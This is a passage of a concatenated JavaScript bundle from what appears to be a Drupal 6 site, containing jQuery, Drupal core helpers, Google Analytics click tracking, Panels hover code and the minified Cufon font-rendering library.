G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;
// $Id: googleanalytics.js,v 1.9.2.8 2011/02/05 19:53:32 hass Exp $

$(document).ready(function() {

  // Attach onclick event to document only and catch clicks on all elements.
  $(document.body).click(function(event) {
    // Catch only the first parent link of a clicked element.
    $(event.target).parents("a:first,area:first").andSelf().filter("a,area").each(function() {

      var ga = Drupal.settings.googleanalytics;
      // Expression to check for absolute internal links.
      var isInternal = new RegExp("^(https?):\/\/" + window.location.host, "i");
      // Expression to check for special links like gotwo.module /go/* links.
      var isInternalSpecial = new RegExp("(\/go\/.*)$", "i");
      // Expression to check for download links.
      var isDownload = new RegExp("\\.(" + ga.trackDownloadExtensions + ")$", "i");

      // Is the clicked URL internal?
      if (isInternal.test(this.href)) {
        // Is download tracking activated and the file extension configured for download tracking?
        if (ga.trackDownload && isDownload.test(this.href)) {
          // Download link clicked.
          var extension = isDownload.exec(this.href);
          _gaq.push(["_trackEvent", "Downloads", extension[1].toUpperCase(), this.href.replace(isInternal, '')]);
        }
        else if (isInternalSpecial.test(this.href)) {
          // Keep the internal URL for Google Analytics website overlay intact.
          _gaq.push(["_trackPageview", this.href.replace(isInternal, '')]);
          setTimeout('document.location = "' + this.href + '"', 100);
        }
      }
      else {
        if (ga.trackMailto && $(this).is("a[href^=mailto:],area[href^=mailto:]")) {
          // Mailto link clicked.
          _gaq.push(["_trackEvent", "Mails", "Click", this.href.substring(7)]);
        }
        else if (ga.trackOutgoing && this.href) {
          if (ga.trackOutboundAsPageview) {
            // Track all external links as page views after URL cleanup.
            // Currently required, if click should be tracked as goal.
            _gaq.push(["_trackPageview", '/outbound/' + this.href.replace(/^(https?|ftp|news|nntp|telnet|irc|ssh|sftp|webcal):\/\//i, '').split('/').join('--')]);
            setTimeout('document.location = "' + this.href + '"', 100);
          }
          else {
            // External link clicked.
            _gaq.push(["_trackEvent", "Outbound links", "Click", this.href]);
  
            // First, delay the outbound click by a fraction of a second.
            // This delay will hardly be noticeable by the user, but it will provide the
            // browser more time load the tracking code. Without this method, it's possible
            // that a user can click on the outbound link before the tracking code loads,
            // in which case the event will not be recorded.
            // See http://www.google.com/support/analytics/bin/answer.py?hl=en&answer=55527
            setTimeout('document.location = "' + this.href + '"', 100);
          }
        }
      }
    });
  });
});
;
// $Id: panels.js,v 1.2.4.1 2009/10/05 22:40:35 merlinofchaos Exp $

(function ($) {
  Drupal.Panels = {};

  Drupal.Panels.autoAttach = function() {
    if ($.browser.msie) {
      // If IE, attach a hover event so we can see our admin links.
      $("div.panel-pane").hover(
        function() {
          $('div.panel-hide', this).addClass("panel-hide-hover"); return true;
        },
        function() {
          $('div.panel-hide', this).removeClass("panel-hide-hover"); return true;
        }
      );
      $("div.admin-links").hover(
        function() {
          $(this).addClass("admin-links-hover"); return true;
        },
        function(){
          $(this).removeClass("admin-links-hover"); return true;
        }
      );
    }
  };

  $(Drupal.Panels.autoAttach);
})(jQuery);
;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var 